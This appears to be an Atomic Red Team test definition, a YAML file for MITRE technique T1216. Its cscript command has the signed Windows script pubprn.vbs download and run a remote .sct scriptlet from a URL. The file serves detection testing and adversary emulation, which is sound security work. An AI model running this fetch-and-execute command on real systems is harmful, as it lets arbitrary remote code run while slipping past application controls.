Files
atomic-red-team/atomics/T1216/T1216.yaml
T
Carrie Roberts 1bfefdacfc Add elevated (#542)
* provide elevation_required attribute

* provide elevation_required attribute

* provide elevation_required attribute
2019-09-03 07:34:42 -06:00

24 lines
722 B
YAML

---
attack_technique: T1216
display_name: Signed Script Proxy Execution
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
description: |
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
supported_platforms:
- windows
input_arguments:
remote_payload:
description: A remote payload to execute using PubPrn.vbs.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
executor:
name: command_prompt
elevation_required: false
command: |
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"